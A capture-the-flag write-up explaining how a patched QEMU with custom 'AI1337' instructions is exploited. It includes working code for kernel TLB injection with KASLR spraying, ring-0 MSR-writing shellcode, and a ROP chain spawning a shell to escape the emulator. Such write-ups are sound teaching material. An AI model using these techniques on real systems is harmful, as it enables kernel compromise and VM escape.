Tags: x86-64 pwn qemu kernel amd64 

author: 0x6fe1be2

Description:

You have the great pleasure of sampling our HXP HACK-4 AI1337 processor - an intersection of Security and AI.
Like it? We have many in the pipeline!

Dist

-- sisu

TL;DR

The challenge consists of a modified QEMU binary that adds new instructions to the existing x86-64 set, notably MTS (copy bytes from memory into scratch memory) and STM (copy bytes from scratch memory back to memory), which are unprivileged, and SCRHLW (update the scratch memory base VA), which is privileged.
Additionally, two MSRs (Model Specific Registers) were added, with the defaults MSR_HACK4_SLICE_SIZE=0x400 and MSR_HACK4_NUM_SLICES=33. The privileged SCRHLW instruction can be accessed through a prctl option, PR_SET_SCRATCH_HOLE, patched into the Linux kernel, and seems to directly affect the TLB (Translation Lookaside Buffer), which we can exploit.

  1. We exploit the TLB update in SCRHLW to inject CPL0 shellcode.
  2. We modify the MSRs to allow OOB access; the scratch memory they describe is backed by a stack array in QEMU.
  3. We use the OOB access to write a ROP chain inside QEMU, escape, and get the flag.

Overview

Let's give a brief overview of the challenge components.

Files

hxp_silicon_foundaries_hack4-7786be6f6ac42883.tar.xz

.
└── hxp_silicon_foundaries_hack4
    ├── Dockerfile
    ├── bzImage
    ├── compose.yml
    ├── example_program
    │   ├── ai.s
    │   ├── build.sh
    │   └── main.c
    ├── flag.txt
    ├── hxp_ai1337.pdf
    ├── initramfs.cpio
    ├── launch_vm.sh
    ├── linux_build
    │   └── 0001-Add-PR_SET_SCRATCH_HOLE.patch
    ├── pow-solver
    ├── pow-solver.cpp
    ├── qemu_build
    │   ├── 0001-Add-hack4-ai1337.patch
    │   ├── Dockerfile
    │   └── build_package
    │       ├── bios-256k.bin
    │       ├── efi-e1000.rom
    │       ├── kvmvapic.bin
    │       ├── linuxboot_dma.bin
    │       └── qemu_system_x86_64_ai1337
    └── ynetd

Deployment

The challenge creators were nice enough to give us basically all files necessary for deploying the challenge. This is mostly interesting when exploiting the QEMU binary, as this is pretty similar to userland exploitation, and knowing the correct libraries through the Dockerfile will be helpful.

We can also see that the flag is not inside the VM, telling us that we will have to escape QEMU if we want to get it.

Challenge

Now let's look at the more interesting files:

Kernel

The kernel-related files seem to be rather standard: we have an initramfs.cpio, which contains our filesystem (note: kernel challenges normally don't bother booting into e.g. an XFS rootfs and just stay inside the initramfs), and a kernel bzImage (which seems to be 6.12.1).

We have also been given a kernel patch file, which adds a new prctl option called PR_SET_SCRATCH_HOLE that executes a "new" assembly instruction, SCRHLW, which has been added through QEMU.

0001-Add-PR_SET_SCRATCH_HOLE.patch
Details

Even though the Linux kernel doesn't seem to have a deliberate vulnerability, it will be important, because we start out as an unprivileged user. QEMU exploits usually require CPL0 (Ring 0) access, which we should keep in mind.

QEMU

QEMU seems to be the focus of this challenge. We are given a patched binary qemu_system_x86_64_ai1337 and a patch file which we will have to analyse, because it's probably where the vulnerability will lie.

0001-Add-hack4-ai1337.patch
Details

Also, luckily for us, we have been given an assembly file that provides stubs for interacting with the custom instructions.

ai.s
Details

Last but not least, we have the command used for starting the VM. One important thing to notice is that neither SMAP nor SMEP is enabled, allowing us to write a second-stage payload directly in userland and jump to it without first having to disable them through CR4.

launch_vm.sh
Details

Docs

We have also been given some form of device specification as a .pdf (hxp_silicon_foundaries_hack4/hxp_ai1337.pdf) and an .rst, which explains a number of instructions/MSRs that have been added through QEMU and will be the target of our exploit:

Instructions:

Opcode    Instruction          Description
0F 0A 83  MTS                  Load RCX bytes from memory address (RSI) to slice (RBX) at slice offset (RDI)
0F 0A 84  STM                  Read RCX bytes from slice (RBX) at slice offset (RDI) and write memory address (RSI)
0F 0A 85  FSCR                 Clear all slices
0F 0A 86  SCRADD               Add the slices pointed by RDI and RSI, and store the result into slice pointed by RDX
0F 0A 87  SCRSUB               Subtract the slices pointed by RDI and RSI, and store the result into slice pointed by RDX
0F 0A 88  SCRMUL               Multiply the slices pointed by RDI and RSI, and store the result into slice pointed by RDX
0F 0A 89  SCRHLW (privileged)  Update scratch memory PSCHORR bi-ATS base VA
0F 0A 8A  SCRHLR               Read scratch memory PSCHORR bi-ATS base VA

MSRs:

MSR                   Identifier  Description
MSR_HACK4_SLICE_SIZE  0xC0000105  Read/Write slice size in the AI1337 engine
MSR_HACK4_NUM_SLICES  0xC0000106  Read/Write count of slices in the AI1337 engine

We also receive multiple ASCII diagrams, notably this one, which is going to be relevant for our exploit.

      Physical Memory                Virtual Memory
            0                               |
            |                               |
  IO space  |                               |
            |                               |
            -                               |
            |                               |
            |                               |
            |                               |   Direct Addressing
    RAM     |                               |           |
            |    ___________________________|_____      |
            |   /                       |        |      |
            ---/                        | bi-ATS |------|
            |                           |        |
            |    _______________________|________|
  AI1337    |   /
 aperture   |  /  PSCHORR Interconnect
            ---

Test Environment

I'm using the following tools for writing and testing my exploit:

  • vagd userland exploitation templates using docker which is based on pwntools
  • how2keap kernel exploitation template
  • pwndbg gdb plugin for kernel- and userland exploitation

Exploit

Let's start with writing our exploit:

Vulnerabilities

As teased before, there seem to be vulnerabilities in the implementation of the x86-64 extension called AI1337. Let's have a closer look at the patches.

First some constants are defined which will be relevant for the patch.

target/i386/ops_ai1337.h

#define AI1337_SCRATCH_SIZE (33ULL * 1024)
#define AI1337_SCRATCH_MAX_NUM_SLICES (128)
#define AI1337_SCRATCH_SLICE_SIZE_DEFAULT (1024ULL)
#define AI1337_SCRATCH_NUM_SLICES_DEFAULT (33UL)
#define AI1337_SCRATCH_MAX_SLICE_SIZE (4096ULL)

Then the new state is initialised directly in the CPU. Note that a stack array scratch[AI1337_SCRATCH_SIZE] is used as the backing storage for the scratch operations. It seems like this won't be able to hold AI1337_SCRATCH_MAX_NUM_SLICES * AI1337_SCRATCH_MAX_SLICE_SIZE bytes (foreshadowing).

target/i386/cpu.c

...
        env->scratch_config.num_active_slices = AI1337_SCRATCH_NUM_SLICES_DEFAULT;
        env->scratch_config.slice_size = AI1337_SCRATCH_SLICE_SIZE_DEFAULT;
        env->scratch_config.va_base = AI1337_SCRATCH_VA_BASE;
        env->scratch_config.phys_base = AI1337_SCRATCH_PHYS_BASE;
        env->scratch_config.access_enabled = 0;

        uint16_t scratch[AI1337_SCRATCH_SIZE];
        env->scratch_region = malloc(sizeof(MemoryRegion));
        memset(env->scratch_region, 0, sizeof(*env->scratch_region));
        memory_region_init_ram_ptr(env->scratch_region, NULL, "ai1337-scratch", AI1337_SCRATCH_SIZE, scratch);
        env->scratch_region->ram_block->flags |= RAM_RESIZEABLE;
        env->scratch_region->ram_block->max_length = AI1337_SCRATCH_MAX_NUM_SLICES * AI1337_SCRATCH_MAX_SLICE_SIZE;
        memory_region_add_subregion(get_system_memory(), AI1337_SCRATCH_PHYS_BASE, env->scratch_region);
        ...
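
To make the size mismatch concrete, here is a small sketch that redoes the arithmetic with the constants from ops_ai1337.h. The helper names are hypothetical and not part of the patch; the only facts used are the macro values and that the array elements are uint16_t. Note that the memory region itself is initialised with AI1337_SCRATCH_SIZE bytes, while the array behind it is twice that size in bytes.

```c
#include <stdint.h>

/* Constants copied from target/i386/ops_ai1337.h */
#define AI1337_SCRATCH_SIZE (33ULL * 1024)
#define AI1337_SCRATCH_MAX_NUM_SLICES (128)
#define AI1337_SCRATCH_MAX_SLICE_SIZE (4096ULL)

/* Hypothetical helper: bytes occupied by `uint16_t scratch[AI1337_SCRATCH_SIZE]`. */
uint64_t scratch_backing_bytes(void) {
    return AI1337_SCRATCH_SIZE * sizeof(uint16_t);
}

/* Hypothetical helper: largest size the region is allowed to grow to. */
uint64_t scratch_max_bytes(void) {
    return AI1337_SCRATCH_MAX_NUM_SLICES * AI1337_SCRATCH_MAX_SLICE_SIZE;
}

/* Hypothetical helper: bytes reachable past the end of the stack array. */
uint64_t scratch_overhang_bytes(void) {
    return scratch_max_bytes() - scratch_backing_bytes();
}
```

So the array covers 0x10800 bytes, while the region may be configured to span 0x80000 bytes, leaving 0x6f800 bytes of whatever follows the array in QEMU's memory within reach.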

When we write the MSRs, we directly change the values inside the CPU config. The memory region is resized, but its backing storage is still the fixed-size stack array, which should lead to an OOB. Sadly, the MSRs can only be written from CPL0, which isn't possible as an unprivileged user.

target/i386/tcg/sysemu/misc_helper.c

...
static bool helper_recalculate_scratch(CPUX86State *env, uint32_t new_num_slices, uint32_t new_slice_size)
{
    if (new_num_slices > AI1337_SCRATCH_MAX_NUM_SLICES) {
        return false;
    }
    if (new_slice_size > AI1337_SCRATCH_MAX_SLICE_SIZE) {
        return false;
    }
    uint32_t new_size = new_num_slices * new_slice_size;
    Error *err = NULL;
    bql_lock();
    memory_region_ram_resize(env->scratch_region, new_size, &err);
    bql_unlock();
    if (err) {
        return false;
    }
    env->scratch_config.num_active_slices = new_num_slices;
    env->scratch_config.slice_size = new_slice_size;
    return true;
}

void helper_wrmsr(CPUX86State *env)
...
    case MSR_HACK4_SLICE_SIZE:
        const uint32_t new_slice_size = val;
        if (!helper_recalculate_scratch(env, env->scratch_config.num_active_slices, new_slice_size)) {
            goto error;
        }
        break;
    case MSR_HACK4_NUM_SLICES:
        const uint32_t new_num_active_slices = val;
        if (!helper_recalculate_scratch(env, new_num_active_slices, env->scratch_config.slice_size)) {
            goto error;
        }
        break;
...
void helper_rdmsr(CPUX86State *env)
...
    case MSR_HACK4_SLICE_SIZE:
        val = env->scratch_config.slice_size;
        break;
    case MSR_HACK4_NUM_SLICES:
        val = env->scratch_config.num_active_slices;
        break;
...
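
As a sanity check, the bounds checks of helper_recalculate_scratch can be modelled in isolation. This is only a sketch: the function name msr_values_accepted is made up, and the call to memory_region_ram_resize (which could also fail) is deliberately not modelled.

```c
#include <stdbool.h>
#include <stdint.h>

/* Limits copied from target/i386/ops_ai1337.h */
#define AI1337_SCRATCH_MAX_NUM_SLICES 128u
#define AI1337_SCRATCH_MAX_SLICE_SIZE 4096u

/*
 * Hypothetical model of the two limit checks in helper_recalculate_scratch.
 * On success, *new_size receives the size the region would be resized to.
 */
bool msr_values_accepted(uint32_t num_slices, uint32_t slice_size,
                         uint32_t *new_size) {
    if (num_slices > AI1337_SCRATCH_MAX_NUM_SLICES) {
        return false;
    }
    if (slice_size > AI1337_SCRATCH_MAX_SLICE_SIZE) {
        return false;
    }
    *new_size = num_slices * slice_size;
    return true;
}
```

Writing the slice size first (33 slices of 0x1000 bytes) and the slice count second (128 slices of 0x1000 bytes) keeps both writes within the limits, and neither check compares the result against the size of the stack array.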

And yes, it looks like we get an OOB when writing to or reading from the scratch_region after editing the MSRs.

target/i386/tcg/translate.c

...
static void gen_mts_8(DisasContext *s, MemOp ot)
{
    const size_t slice_size_offset = offsetof(CPUX86State, scratch_config.slice_size);
    const size_t va_base_offset = offsetof(CPUX86State, scratch_config.va_base);
    const size_t access_offset = offsetof(CPUX86State, scratch_config.access_enabled);

    const TCGv slice_index = cpu_regs[R_EBX];
    const TCGv offset_in_slice = cpu_regs[R_EDI];
    const TCGv memory_address = cpu_regs[R_ESI];
    const TCGv dshift = gen_compute_Dshift(s, ot);

    tcg_gen_st_tl(tcg_constant_i64(1), tcg_env, access_offset);

    // load from memory address
    gen_lea_v_seg(s, memory_address, R_DS, -1);
    gen_op_ld_v(s, MO_8, s->T0, s->A0);

    // Calculate address for scratch
    // A0 = offset_in_slice + slice_base + (slice_index * slice_size)
    tcg_gen_ld_tl(s->A0, tcg_env, va_base_offset);
    gen_lea_v_seg(s, s->A0, R_ES, -1);
    tcg_gen_add_tl(s->A0, s->A0, offset_in_slice);
    tcg_gen_ld32u_tl(s->tmp0, tcg_env, slice_size_offset);
    tcg_gen_mul_tl(s->tmp0, s->tmp0, slice_index);
    tcg_gen_add_tl(s->A0, s->A0, s->tmp0);

    // Store value
    gen_op_st_v(s, MO_8, s->T0, s->A0);

    gen_op_add_reg(s, s->aflag, R_ESI, dshift);
    gen_op_add_reg(s, s->aflag, R_EDI, dshift);

    tcg_gen_st_tl(tcg_constant_i64(0), tcg_env, access_offset);
}

static void gen_stm_8(DisasContext *s, MemOp ot)
{
    ...
    // similar to gen_mts_8
    ...
}
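
The address computation in gen_mts_8 boils down to one line of arithmetic. The sketch below mirrors the comment in the patch (A0 = va_base + offset_in_slice + slice_index * slice_size); the function name scratch_va is hypothetical, segment bases are ignored, and the arithmetic wraps modulo 2^64, which is our reading of the 64-bit TCG add and mul ops.

```c
#include <stdint.h>

/*
 * Hypothetical model of the address computed by gen_mts_8/gen_stm_8:
 *   A0 = va_base + offset_in_slice + slice_index * slice_size
 * slice_size is loaded as an unsigned 32-bit value, slice_index is all of RBX.
 */
uint64_t scratch_va(uint64_t va_base, uint64_t slice_index,
                    uint32_t slice_size, uint64_t offset_in_slice) {
    return va_base + offset_in_slice + (uint64_t)slice_size * slice_index;
}
```

Nothing here checks slice_index against the number of active slices, so the only guard is the window check applied when the TLB is filled. A slice index of -1 yields an address just below va_base, which is presumably why load_scratch(-1, ...) is a convenient way to fault on purpose.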

Finally let's have a look at the inner workings of SCRHLW.

target/i386/tcg/emit.c.inc

static void gen_SCRHLW(DisasContext *s, X86DecodedInsn *decode)
{
    if (CPL(s) != 0)
    {
        gen_illegal_opcode(s);
        return;
    }
    size_t va_base_offset = offsetof(CPUX86State, scratch_config.va_base);
    tcg_gen_st_tl(cpu_regs[R_EDI], tcg_env, va_base_offset);
}

And we notice that this seems to unsafely update the TLB, which we can exploit. This implements the functionality described in the diagram before: notably, our scratch_region is made directly accessible through virtual memory using the TLB.

target/i386/tcg/sysemu/excp_helper.c

...
bool x86_cpu_tlb_fill(CPUState *cs, vaddr addr, int size,
                      MMUAccessType access_type, int mmu_idx,
                      bool probe, uintptr_t retaddr)
...
    if (env->scratch_config.access_enabled &&
        (addr >= env->scratch_config.va_base) &&
        ((addr + size) <= (env->scratch_config.va_base + x86_calculate_scratch_size(env)))) {
        vaddr paddr = env->scratch_config.phys_base + (addr - env->scratch_config.va_base);
        tlb_set_page_with_attrs(cs, addr & TARGET_PAGE_MASK,
                                paddr & TARGET_PAGE_MASK,
                                cpu_get_mem_attrs(env),
                                PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE);
        return true;
    }
...
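
The window check in x86_cpu_tlb_fill can be modelled as a plain function to see what it does and does not verify. This is a sketch under assumptions: scratch_cfg is a hypothetical mirror of env->scratch_config, and its size field stands in for x86_calculate_scratch_size(env), whose body is not shown in the excerpt.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical mirror of the fields used by the check. */
typedef struct {
    uint64_t va_base;
    uint64_t phys_base;
    uint64_t size;           /* stands in for x86_calculate_scratch_size(env) */
    bool access_enabled;
} scratch_cfg;

/*
 * Returns true and sets *paddr if [addr, addr + size) lies inside the
 * scratch window, mirroring the condition in x86_cpu_tlb_fill.
 */
bool scratch_translate(const scratch_cfg *c, uint64_t addr, uint64_t size,
                       uint64_t *paddr) {
    if (c->access_enabled &&
        addr >= c->va_base &&
        addr + size <= c->va_base + c->size) {
        *paddr = c->phys_base + (addr - c->va_base);
        return true;
    }
    return false;
}
```

The condition only looks at the address range. It does not consult the page tables or the privilege level of the range, and the entry is installed with read, write and execute permissions, so a va_base inside kernel text is accepted like any other.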

Sadly, SCRHLW is only accessible in CPL0, but luckily for us they patched the kernel to give us access through prctl.

include/uapi/linux/prctl.h

...
#define PR_SET_SCRATCH_HOLE     0x53534352
...

kernel/sys.c

static noinstr int prctl_set_scratch_hole(unsigned long opt, unsigned long addr,
                  unsigned long size, unsigned long arg)
{
    const u64 new_scratch_hole = opt;
    if ((new_scratch_hole & 0xFFFUL) != 0U) {
        return -EINVAL;
    }
    if (new_scratch_hole < mmap_min_addr) {
        return -EINVAL;
    }
    asm volatile(
        "mov %0, %%rdi\n\t"
        ".byte 0x0f; .byte 0x0a; .byte 0x89\n\t" // scrhlw
        :
        : "r"(new_scratch_hole)
        : "rdi", "memory"
    );
    return 0;
}

...
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
        unsigned long, arg4, unsigned long, arg5)  
...
    case PR_SET_SCRATCH_HOLE:
        error = prctl_set_scratch_hole(arg2, arg3, arg4, arg5);
        break;
...
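
The two checks in prctl_set_scratch_hole are easy to model. In the sketch below the function name scratch_hole_accepted is hypothetical, and the value passed for mmap_min_addr in the examples (0x10000) is an assumption about the kernel configuration, not something taken from the challenge.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Hypothetical model of the validation in prctl_set_scratch_hole:
 * the address must be page aligned and not below mmap_min_addr.
 */
bool scratch_hole_accepted(uint64_t addr, uint64_t min_addr) {
    if ((addr & 0xFFFULL) != 0) {
        return false;   /* -EINVAL: not 4 KiB aligned */
    }
    if (addr < min_addr) {
        return false;   /* -EINVAL: below mmap_min_addr */
    }
    return true;
}
```

There is no upper bound, so a page-aligned kernel address such as 0xffffffff81000000 passes just like a userland one.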

Linux Privilege Escalation

So how do we exploit an unsafe TLB update? Basically, this allows us to corrupt any virtual memory mapping we want (even CPL0 ones) as long as there is no existing TLB entry (this is an important consideration).

Also, luckily for us, KASLR is notoriously weak and only 16 bit (kaslr.c), which is realistically brute-forceable with a non-crashing spray, which we have.

TLB Inject

So we create a simple PoC that sprays NOPs (0x90) and see whether we can trigger a fault inside the kernel.

#define START_SEARCH 0xffffffff80000000
#define END_SEARCH   0xfffffffffff00000
int main(int argc, char *argv[]) {

  lstage("INIT");
  

  // cyclic_cpy(spray, 0x1000);
  rlimit_increase(RLIMIT_NOFILE);
  pin_cpu(0, 0);

  // Gather info about scratch memory
  scratch_info info = {0};
  get_scratch_info(&info);
  linfo("Scratch info:");
  linfo(" - scratch addr: 0x%lx", info.scratch_addr);
  linfo(" - scratch default size: 0x%lx bytes", info.scratch_default_size);
  linfo(" - scratch max slice size: 0x%x bytes", info.scratch_max_slice_size);
  linfo(" - scratch max slice count: %u", info.scratch_max_slice_count);

  linfo("PSCHORR bi-ATS base VA: %p", read_ats_base());

  lstage("START");

  size_t slice_size_value = 0x400;
  size_t *trampolin = (size_t*) 0x6fe1be2000;

  char package[0x8000];
  memset(package, 0x90, sizeof(package)); // spray NOPs (0x90)
  memcpy(&package[sizeof(package) - sizeof(pivot)], pivot, sizeof(pivot));

  SYSCHK(prctl(PR_SET_SCRATCH_HOLE, trampolin));
  for (size_t i = 0; i < sizeof(package) / 0x400; i++) {
    load_scratch(i, 0, &package[i * slice_size_value], slice_size_value);
  }

  pid_t pid = fork();
  if (pid == 0) {
    linfo("crash and corrupt CPL0 TLB: %p", payload);
    load_scratch(-1, 0, "X", 1); // segfault
  }
  wait(NULL); // clear TLB allowing injection
  linfo("spray kaslr");

  for (trampolin = (size_t*) (START_SEARCH); 
      (size_t) trampolin < END_SEARCH; trampolin += 0x100000 / sizeof(size_t)) {
    // linfo("spray aslr: %p", trampolin);
    SYSCHK(prctl(PR_SET_SCRATCH_HOLE, trampolin));
    if (((size_t) trampolin & 0xfffffff) == 0)
      linfo("spray aslr: %p", trampolin);
    // flush TLB
    pid_t pid = fork();
    if (pid == 0) 
      load_scratch(-1, 0, "X", 1);
    wait(NULL);
  }
  putchar('\n');

  lstage("END");
}
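
For a feeling of how much work the spray loop does, the number of candidate bases can be computed from the loop bounds. The helper names below are hypothetical; the constants are the ones from the PoC.

```c
#include <stdbool.h>
#include <stdint.h>

#define START_SEARCH 0xffffffff80000000ULL
#define END_SEARCH   0xfffffffffff00000ULL
#define SPRAY_STEP   0x100000ULL   /* stride used by the spray loop */

/* Hypothetical helper: number of iterations of the spray loop. */
uint64_t spray_candidates(void) {
    return (END_SEARCH - START_SEARCH + SPRAY_STEP - 1) / SPRAY_STEP;
}

/* Hypothetical helper: is addr one of the bases the loop passes to prctl? */
bool is_spray_candidate(uint64_t addr) {
    return addr >= START_SEARCH && addr < END_SEARCH &&
           (addr - START_SEARCH) % SPRAY_STEP == 0;
}
```

That gives 2047 prctl calls, each followed by a fork that faults on purpose, which is cheap enough to run on every attempt.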

And luckily we get the following, which indicates that our NOP sled spray worked and that we tried to execute some invalid NULL bytes afterwards.

[    3.646252] Call Trace:
[    3.646354]  <TASK>
[    3.655379] Oops: general protection fault, probably for non-canonical address 0x257830203a731fb1: 0000 [#23] PREEMPT SMP NOPTI
[    3.655877] CPU: 0 UID: 1000 PID: 57 Comm: pwn Not tainted 6.12.1 #2
[    3.656141] RIP: 0010:0xffffffff81008000
[    3.656332] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 <00> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[    3.657072] RSP: 0018:ffffc90000114800 EFLAGS: 00010007
[    3.657284] RAX: 257830203a731fb1 RBX: 48c35b02760100c5 RCX: 0000000000000000
[    3.657546] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 48c35b02760100c5
[    3.657791] RBP: ffffc900001149c8 R08: ffffffff81c95968 R09: 00000000ffffefff
[    3.658058] R10: ffffffff81c25980 R11: ffffffff81c7d980 R12: 48c35b02760100c5
[    3.658323] R13: ffffc90000114900 R14: ffffc900001149c8 R15: ffffffff81ac882d
[    3.658584] FS:  000000000040c878(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[    3.658871] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    3.659078] CR2: 257830203a731fb1 CR3: 00000000028b4000 CR4: 00000000000006b0
[    3.659330] Call Trace:
[    3.659457]  <TASK>
[    3.668313] Oops: general protection fault, probably for non-canonical address 0x257830203a732031: 0000 [#24] PREEMPT SMP NOPTI
[    3.668793] CPU: 0 UID: 1000 PID: 57 Comm: pwn Not tainted 6.12.1 #2
[    3.669052] RIP: 0010:0xffffffff81008000

CPL0 Shellcode

So next we need to create some CPL0 Shellcode.

Corrupt MSR

Let's start out simple and just overwrite the MSRs with their respective max values, and to our luck it works.

crpt_msr.S

; nasm -f bin ./crpt_msr.S && xxd -i crpt_msr > crpt_msr.h
 
MSR_HACK4_SLICE_SIZE equ 0xc0000105
MSR_HACK4_NUM_SLICES equ 0xc0000106

BITS 64
  xor rdx, rdx

  mov rax, 0x1000
  mov ecx, MSR_HACK4_SLICE_SIZE 
  wrmsr

  mov rax, 128
  mov ecx, MSR_HACK4_NUM_SLICES
  wrmsr

  int3

crpt_msr.h

unsigned char crpt_msr[] = {
  0x48, 0x31, 0xd2, 0xb8, 0x00, 0x10, 0x00, 0x00, 0xb9, 0x05, 0x01, 0x00,
  0xc0, 0x0f, 0x30, 0xb8, 0x80, 0x00, 0x00, 0x00, 0xb9, 0x06, 0x01, 0x00,
  0xc0, 0x0f, 0x30, 0xcc
};
unsigned int crpt_msr_len = 28;
...
  char package[0x8000];
  memset(package, 0x90, sizeof(package));
  memcpy(&package[sizeof(package) - sizeof(crpt_msr)], crpt_msr, sizeof(crpt_msr));
...
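
The package layout (NOP sled first, shellcode at the very end) can be wrapped in a small helper. This is a sketch with a made-up name, build_sled, and a length check that the PoC does not have.

```c
#include <stddef.h>
#include <string.h>

/*
 * Hypothetical helper: fill buf with NOPs (0x90) and place the shellcode
 * so that it ends exactly at the end of buf.
 * Returns the offset of the shellcode, or (size_t)-1 if it does not fit.
 */
size_t build_sled(unsigned char *buf, size_t buf_len,
                  const unsigned char *code, size_t code_len) {
    if (code_len > buf_len) {
        return (size_t)-1;
    }
    memset(buf, 0x90, buf_len);
    size_t off = buf_len - code_len;
    memcpy(buf + off, code, code_len);
    return off;
}
```

With a 0x8000-byte package and the 28-byte crpt_msr blob, the shellcode starts at offset 0x7fe4, so execution entering anywhere earlier in the sprayed range slides into it.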

Pivot

Now we need to somehow continue our exploit. As mentioned before, neither SMAP nor SMEP is enabled, allowing us to jump directly back into userspace, so let's do that.

pivot.S

; nasm -f bin ./pivot.S && xxd -i pivot > pivot.h
 
MSR_HACK4_SLICE_SIZE equ 0xc0000105
MSR_HACK4_NUM_SLICES equ 0xc0000106

BITS 64
  xor rdx, rdx

  mov rax, 0x1000
  mov ecx, MSR_HACK4_SLICE_SIZE 
  wrmsr

  mov rax, 128
  mov ecx, MSR_HACK4_NUM_SLICES
  wrmsr

  scasb
  mov r15, 0x1111111111111111
  call r15


pivot.h

unsigned char pivot[] = {
  0x48, 0x31, 0xd2, 0xb8, 0x00, 0x10, 0x00, 0x00, 0xb9, 0x05, 0x01, 0x00,
  0xc0, 0x0f, 0x30, 0xb8, 0x80, 0x00, 0x00, 0x00, 0xb9, 0x06, 0x01, 0x00,
  0xc0, 0x0f, 0x30, 0xae, 0x49, 0xbf, 0x11, 0x11, 0x11, 0x11, 0x11, 0x11,
  0x11, 0x11, 0x41, 0xff, 0xd7
};
unsigned int pivot_len = 41;
...
void payload() {
    asm("int3");
}
...
  size_t* p = memmem(pivot, sizeof(pivot), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
  if (p != NULL) 
    *p = (size_t) &payload;
...
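
The placeholder patching can also be written without memmem and without storing through a possibly unaligned size_t pointer. The sketch below is a portable variant with a hypothetical name, patch_placeholder; it assumes a little-endian host, which holds for x86-64.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Hypothetical helper: find the first occurrence of the 8-byte placeholder
 * in code and overwrite it with target.
 * Returns the offset that was patched, or -1 if no placeholder was found.
 */
long patch_placeholder(unsigned char *code, size_t len,
                       uint64_t placeholder, uint64_t target) {
    for (size_t i = 0; i + sizeof(placeholder) <= len; i++) {
        if (memcmp(code + i, &placeholder, sizeof(placeholder)) == 0) {
            memcpy(code + i, &target, sizeof(target));
            return (long)i;
        }
    }
    return -1;
}
```

For the pivot blob above, the placeholder sits at offset 30, directly after the 49 bf opcode bytes of mov r15, imm64.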

AND IT WORKS!

QEMU Escape

After corrupting the MSRs to achieve OOB access, we can simply leak memory from inside QEMU and then use that information to drop a shell and read the flag.

#define BOF_IDX      16
#define BOF_OFFSET   0x800

void payload() {
  char leak[0x400];
  read_scratch(BOF_IDX, BOF_OFFSET, leak, sizeof(leak));
  size_t offset = 0x3d8;

  size_t libc = *(size_t*)&leak[0x378] - 0x11b9e1; 
  load_scratch(0, 0, &me, 8);
  load_scratch(0, 8, &libc, 8);

  size_t bof_size = sizeof(leak) - offset;
  char* bof = leak + offset;

  bzero(bof, bof_size);
  ((size_t*)bof)[0] = libc + 0x10f75b+1; // ret 
  ((size_t*)bof)[1] = libc + 0x10f75b;   // pop rdi; ret 
  ((size_t*)bof)[2] = libc + 0x1cb42f;   // "/bin/sh"
  ((size_t*)bof)[3] = libc + 0x58740;    // system
  load_scratch(BOF_IDX, BOF_OFFSET + offset, bof, bof_size);
  for(;;);
}
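
The numbers in the payload can be checked with a few lines of arithmetic. In this sketch the helper names are hypothetical, the slice size of 0x1000 is the value the pivot shellcode writes to MSR_HACK4_SLICE_SIZE, and all libc offsets are copied from the payload, so they are only meaningful for the libc of the provided Docker image. Reading the leading ret as stack alignment for system is our assumption.

```c
#include <stdint.h>

#define SLICE_SIZE_AFTER_MSR 0x1000ULL  /* written by the pivot shellcode */
#define BOF_IDX      16
#define BOF_OFFSET   0x800

/* Byte offset into the scratch window where the leak/overwrite starts. */
uint64_t bof_window_offset(void) {
    return BOF_IDX * SLICE_SIZE_AFTER_MSR + BOF_OFFSET;
}

/* libc base derived from the leaked pointer (offset from the payload). */
uint64_t libc_base_from_leak(uint64_t leaked) {
    return leaked - 0x11b9e1;
}

/* The four-entry chain from the payload, relative to the libc base. */
void build_chain(uint64_t libc, uint64_t chain[4]) {
    chain[0] = libc + 0x10f75b + 1;  /* ret (assumed: stack alignment) */
    chain[1] = libc + 0x10f75b;      /* pop rdi; ret */
    chain[2] = libc + 0x1cb42f;      /* "/bin/sh" */
    chain[3] = libc + 0x58740;       /* system */
}
```

The window offset comes out as 0x10800, which equals AI1337_SCRATCH_SIZE * sizeof(uint16_t), so the read starts at the first byte past the end of the stack array.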

Final

pwn.c
Details

FLAG: hxp{tH1s_1s_th3_AI_$$$s3Ri3$$$_n0t_tH3_s3CuR3_s3R1eS}

Original writeup (https://hofhackerei.at/blog/hxp_38c3_hack4/).